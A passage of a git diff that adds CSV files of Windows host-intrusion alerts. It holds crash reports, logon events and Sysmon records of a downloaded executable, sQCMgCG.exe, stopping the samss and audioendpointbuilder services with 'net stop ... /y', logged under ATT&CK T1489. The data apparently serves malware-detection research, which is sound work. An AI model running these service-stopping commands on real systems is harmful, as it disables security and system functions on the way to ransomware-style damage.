0.0.0.0 +P3: 5D65FB6A +P4: ffffbaad +P5: +P6: +P7: +P8: +P9: +P10: + +Attached files: +\\?\C:\Windows\SERVIC~1\LOCALS~1\AppData\Local\Temp\FTH2007.tmp\fthempty.txt +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER2008.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER2057.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER2067.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER2078.tmp.txt + +These files may be available here: + + +Analysis symbol: +Rechecking for solution: 0 +Report Id: a99f24b9-29ac-45cc-aa2d-2f5628aa0af5 +Report Status: 268435456 +Hashed bucket: ea03c7813111befe0f56710fb46a69df +Cab Guid: 0""" +"Apr 26, 2020 @ 10:09:20.836",4,"Summary event of the report's signatures",,"""Fault bucket 1416303988536420219, type 4 +Event Name: APPCRASH +Response: Not available +Cab Id: 0 + +Problem signature: +P1: sihost.exe +P2: 10.0.18362.1 +P3: e9587576 +P4: ntdll.dll +P5: 10.0.18362.719 +P6: 64d10ee0 +P7: c0000005 +P8: 000000000003b890 +P9: +P10: + +Attached files: +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER18A5.tmp.dmp +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER1A9A.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER1ACA.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER1AE7.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B36.tmp.txt + +These files may be available here: +\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_sihost.exe_8e8a7b3a9516eb3355c5fecfc9f15289a25db9f_b8434f32_80ed8f93-bf6c-4b7e-926c-1dcbd5c2ae28 + +Analysis symbol: +Rechecking for solution: 0 +Report Id: 581f868a-0357-4466-a2e8-74c009a3bf02 +Report Status: 268435456 +Hashed bucket: 2530936a9b385b37a3a7b8f942aea77b +Cab Guid: 0""" +"Apr 26, 2020 @ 10:09:20.414",9,"Windows Application error event",,"""Faulting application name: OneDrive.exe, version: 19.232.1124.10, time stamp: 0x1482ea94 +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x832e7bce +Exception code: 0xc0000409 +Fault offset: 0x00088d30 +Faulting process id: 0x15fc +Faulting application start time: 0x01d60cd5b4099e08 +Faulting application path: C:\Users\John Williams\AppData\Local\Microsoft\OneDrive\OneDrive.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: 435be01d-fb68-4058-bcfb-f53f9416b141 +Faulting package full name: +Faulting package-relative application ID: """ +"Apr 26, 2020 @ 10:09:19.685",9,"Windows Application error event",,"""Faulting application name: StartMenuExperienceHost.exe, version: 0.0.0.0, time stamp: 0x5d65fb6a +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0 +Exception code: 0xc0000005 +Fault offset: 0x000000000003b890 +Faulting process id: 0x1190 +Faulting application start time: 0x01d60cd5ab65f758 +Faulting application path: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: d1fd5c88-53ca-4622-b3e0-302591f2c16f +Faulting package full name: Microsoft.Windows.StartMenuExperienceHost_10.0.18362.449_neutral_neutral_cw5n1h2txyewy +Faulting package-relative application ID: App""" +"Apr 26, 2020 @ 10:09:18.832",9,"Windows Application error event",,"""Volume Shadow Copy Service information: The COM Server with CLSID {e579ab5f-1cc4-44b4-bed9-de0991ff0623} and name Coordinator cannot be started. [0x80070005, Access is denied. +] """ +"Apr 26, 2020 @ 10:09:18.380",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:09:17.554",9,"Windows Application error event",,"""Faulting application name: sihost.exe, version: 10.0.18362.1, time stamp: 0xe9587576 +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0 +Exception code: 0xc0000005 +Fault offset: 0x000000000003b890 +Faulting process id: 0xcdc +Faulting application start time: 0x01d60cd5a8027622 +Faulting application path: C:\Windows\system32\sihost.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: 581f868a-0357-4466-a2e8-74c009a3bf02 +Faulting package full name: +Faulting package-relative application ID: """ +"Apr 26, 2020 @ 10:09:15.367",3,"Service startup type was changed",,"""The start type of the Background Intelligent Transfer Service service was changed from auto start to demand start.""" +"Apr 26, 2020 @ 10:09:13.882",5,"SCA summary: Benchmark for Windows audit: Score less than 80% (68)",, +"Apr 26, 2020 @ 10:09:10.632",5,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from failed to 'not applicable'",, diff --git a/data/MW_18_HIDS_3.csv b/data/MW_18_HIDS_3.csv new file mode 100644 index 0000000..3195f61 --- /dev/null +++ b/data/MW_18_HIDS_3.csv @@ -0,0 +1,3540 @@ +timestamp,"rule.level","rule.description","data.win.system.message","data.win.eventdata.commandLine","full_log" +"May 23, 2020 @ 12:47:22.533",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:47:20.966 +ProcessGuid: {df9fc3d3-1b58-5ec9-0000-0010e81a2f00} +ProcessId: 344552 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""samss"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-1b58-5ec9-0000-00107b162f00} +ParentProcessId: 344360 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y""","C:\\Windows\\system32\\net1 stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:47:20.968012700Z"",""eventRecordID"":""1737"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:47:20.966\r\nProcessGuid: {df9fc3d3-1b58-5ec9-0000-0010e81a2f00}\r\nProcessId: 344552\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""samss\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-1b58-5ec9-0000-00107b162f00}\r\nParentProcessId: 344360\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-23 12:47:20.966"",""processGuid"":""{df9fc3d3-1b58-5ec9-0000-0010e81a2f00}"",""processId"":""344552"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-1b58-5ec9-0000-00107b162f00}"",""parentProcessId"":""344360"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y""}}}" +"May 23, 2020 @ 12:47:22.481",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:47:20.879 +ProcessGuid: {df9fc3d3-1b58-5ec9-0000-00107b162f00} +ProcessId: 344360 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00} +ParentProcessId: 6312 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:47:20.907046800Z"",""eventRecordID"":""1736"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:47:20.879\r\nProcessGuid: {df9fc3d3-1b58-5ec9-0000-00107b162f00}\r\nProcessId: 344360\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00}\r\nParentProcessId: 6312\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-23 12:47:20.879"",""processGuid"":""{df9fc3d3-1b58-5ec9-0000-00107b162f00}"",""processId"":""344360"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-001047510b00}"",""parentProcessId"":""6312"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\""""}}}" +"May 23, 2020 @ 12:47:22.424",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:47:20.797 +ProcessGuid: {df9fc3d3-1b58-5ec9-0000-0010ba132f00} +ProcessId: 344168 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-1b58-5ec9-0000-0010f00e2f00} +ParentProcessId: 343416 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y""","C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:47:20.831170300Z"",""eventRecordID"":""1735"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:47:20.797\r\nProcessGuid: {df9fc3d3-1b58-5ec9-0000-0010ba132f00}\r\nProcessId: 344168\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-1b58-5ec9-0000-0010f00e2f00}\r\nParentProcessId: 343416\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-23 12:47:20.797"",""processGuid"":""{df9fc3d3-1b58-5ec9-0000-0010ba132f00}"",""processId"":""344168"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-1b58-5ec9-0000-0010f00e2f00}"",""parentProcessId"":""343416"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y""}}}" +"May 23, 2020 @ 12:47:22.395",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:47:20.665 +ProcessGuid: {df9fc3d3-1b58-5ec9-0000-0010f00e2f00} +ProcessId: 343416 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00} +ParentProcessId: 6312 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:47:20.671355100Z"",""eventRecordID"":""1734"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:47:20.665\r\nProcessGuid: {df9fc3d3-1b58-5ec9-0000-0010f00e2f00}\r\nProcessId: 343416\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-001047510b00}\r\nParentProcessId: 6312\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-23 12:47:20.665"",""processGuid"":""{df9fc3d3-1b58-5ec9-0000-0010f00e2f00}"",""processId"":""343416"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-001047510b00}"",""parentProcessId"":""6312"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\""""}}}" +"May 23, 2020 @ 12:46:54.309",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:46:52.960 +ProcessGuid: {df9fc3d3-1b3c-5ec9-0000-0010506e2a00} +ProcessId: 291948 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""samss"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-1b3c-5ec9-0000-001073602a00} +ParentProcessId: 291108 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y""","C:\\Windows\\system32\\net1 stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:46:52.963141200Z"",""eventRecordID"":""1730"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:46:52.960\r\nProcessGuid: {df9fc3d3-1b3c-5ec9-0000-0010506e2a00}\r\nProcessId: 291948\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""samss\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-1b3c-5ec9-0000-001073602a00}\r\nParentProcessId: 291108\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-23 12:46:52.960"",""processGuid"":""{df9fc3d3-1b3c-5ec9-0000-0010506e2a00}"",""processId"":""291948"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-1b3c-5ec9-0000-001073602a00}"",""parentProcessId"":""291108"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y""}}}" +"May 23, 2020 @ 12:46:54.294",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:46:52.911 +ProcessGuid: {df9fc3d3-1b3c-5ec9-0000-0010596a2a00} +ProcessId: 291752 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 